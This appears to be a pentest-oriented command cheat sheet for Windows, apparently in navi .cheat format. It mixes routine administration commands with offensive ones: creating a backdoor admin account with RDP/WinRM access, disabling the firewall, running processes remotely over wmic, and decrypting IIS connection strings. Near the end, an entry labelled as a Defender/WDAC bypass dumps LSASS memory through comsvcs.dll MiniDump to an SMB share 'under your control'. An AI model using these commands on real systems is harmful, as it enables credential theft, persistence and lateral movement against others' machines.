windows.cheat

% windows

# Search for a string within a file
type <file> | find /i "<string>"

# Search for a regexp within a file
type <file> | findstr "<regexp>"

% windows, group

# list local users
net user

# list local users
net localgroup

# list group account
net localgroup <group>

# Create user, add it to admin group, winrm group and rdp group for remote gui (winrm/rdp) access
net user <name> <pass> /add
net localgroup Administrators <name> /add
net localgroup "Remote Management Users" <name> /add
net localgroup "Remote Desktop Users" <name> /add

# Add a user
net user <logon_name> <pass> /add

# Put user in a group
net localgroup <group> <user> /add

# Remove user from group
net localgroup <group> <user> /del

# Del a user
net user <logon_name> /del

% windows, firewall

# See whole firewall config
netsh advfirewall show allprofiles

# Delete firewall rule
netsh advfirewall firewall del <rule> name="<Comment>"

# Disable firewall
netsh advfirewall set allprofiles state off

# show all forwarded port
netsh interface portproxy show all

# add a forward port
netsh interface portproxy add v4tov4 listenport=<lport> listenaddress=<lip> connectaddress=<cip> connectport=<cport>

# delete a port forward
netsh interface portproxy delete v4tov4 listenport=<lport> listenaddress=<lip>

% windows, registry

# Read a reg key
reg query <key>

# Read a reg key remotely 
reg query \\<target> <key>

# Change a key
reg add <keyname> /v <valuename> /t <type> /d <data>

% windows, smb

# Set up a sesion with a target
net use \\<target> <password> /u:<user>

# Mount a target share
net use * \\<target>\share <pass> /u:<user>

# Mount a target share (aternative)
net use * \\<target>\share <pass> /u:<machinename_or_domain>\<user>

# Delt smb session
net use \\<target> /del

# Drop all smb session
net use * /del

% windows, service

# List running services
sc query

# via wmic
wmic service where (displayname like "%<pattern>%") get name

# List running services remotely
sc \\<target> query

# List all services
sc query state= all

# Details for a service
sc query <name>

# show service permission (Security Descriptors show)
sc sdshow <service>

# start a service
sc start <name>

# enable service
sc config <name> start= demand

# stop a service
sc stop <name>

% windows, exec, command, process

# exec command with wmic
wmic /node:<target> /user:<admin_user> /password:<pass> process call create <cmd>

# list process on target
wmic /node:<target> /user:<admin_user> /password:<pass> process list brief

# Kill process on target by pid
wmic /node:<target> /user:<admin_user> /password:<pass> process where porcessid="<pid>" delete

# Kill process on target by name
wmic /node:<target> /user:<admin_user> /password:<pass> process where name="<name>" delete

% windows, env

# whoami
set <user>

# show path for commands to run
set path

% windows, find, search

# basic search
dir /b /s <dir>\<file>

# Find file from systemroot
dir /b /s %systemroot%\<file>

# Bypass WDAC Defender to execute lsass dump without touching disk
New-PSDrive -Name "X" -PSProvider "FileSystem" -Root "\\smbserver_under_your_control\c$"
powershell rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id x:\lassdump.bin full

# IIS decrypt connection strings inside files of IIS Web directory
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.ex e -pdf connectionStrings C:\Inetpub\www\<dir>